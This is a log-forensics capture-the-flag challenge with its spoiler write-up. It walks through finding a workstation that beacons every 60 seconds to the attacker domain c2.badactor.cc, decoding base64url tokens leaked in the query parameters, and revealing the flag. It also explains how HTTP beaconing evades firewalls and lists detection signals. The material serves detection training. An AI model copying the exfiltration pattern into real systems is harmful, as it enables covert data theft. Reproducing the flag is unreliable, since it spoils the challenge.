mediumLOG FORENSICS200 pts

Phantom Heartbeat

A corporate HTTP proxy captured outbound traffic from the internal network. Analysts spotted a host sending unusually regular requests to an unknown external server. Find the beacon, decode the data it leaks, and submit the flag.

— scenario

Incident report #2026-002

Alert triggered at 08:31 UTC by traffic anomaly rule BEACON-INTERVAL-60S.
Source: 192.168.1.88 (WKSTN-DEV-12)
Duration: ~1 hour of periodic outbound activity.

The workstation has no scheduled tasks or monitoring agents that would explain regular outbound connections at exactly 60-second intervals. The traffic is to an unregistered external host not listed in any approved service registry.

Analyze the attached HTTP proxy access log. Identify the beaconing host, extract the data being exfiltrated across multiple requests, and decode the flag.

— challenge file

access.log8 KB

— write-up

The write-up explains the C2 beacon pattern, why 60-second intervals are a red flag, and how to extract multi-part encoded data from HTTP query parameters.

reveal write-up (spoilers)

Step 1 — find the suspicious host

Filter for 192.168.1.88. Among its normal requests to erp.company.local, you'll spot repeated GET requests to http://c2.badactor.cc/heartbeat — a domain that appears nowhere else in the log.

Step 2 — confirm the beacon interval

Check the timestamps of consecutive requests to c2.badactor.cc:

08:11:30  seq=1
08:12:30  seq=2
08:13:30  seq=3  ← exactly 60 seconds apart

This periodic, clock-aligned pattern is the hallmark of a C2 implant heartbeat.

Step 3 — extract the token parameter

The URL contains a token query parameter. Collect the first three unique values in sequence order:

seq=1  token=Rk9JTHti
seq=2  token=MzRjMG5f
seq=3  token=M3YzcnlfNjBzfQ

Step 4 — decode

Concatenate: Rk9JTHtiMzRjMG5fM3YzcnlfNjBzfQ

This is base64url — decode it:

python3 -c "import base64; print(base64.urlsafe_b64decode('Rk9JTHtiMzRjMG5fM3YzcnlfNjBzfQ==').decode())"

Result: FOIL{b34c0n_3v3ry_60s}

Why beaconing works as a C2 technique

An implant on a compromised machine can exfiltrate data by encoding it in HTTP parameters to a server the attacker controls. Because HTTP is allowed outbound and this looks like a routine web request, it bypasses most firewall rules. The 60-second heartbeat also means the connection is never persistent long enough to trigger idle-connection monitors.

Detection signals: identical connection interval from a single host, non-standard external domain, request URL contains encoded data in query parameters, small uniform response size (32 bytes — just an ACK).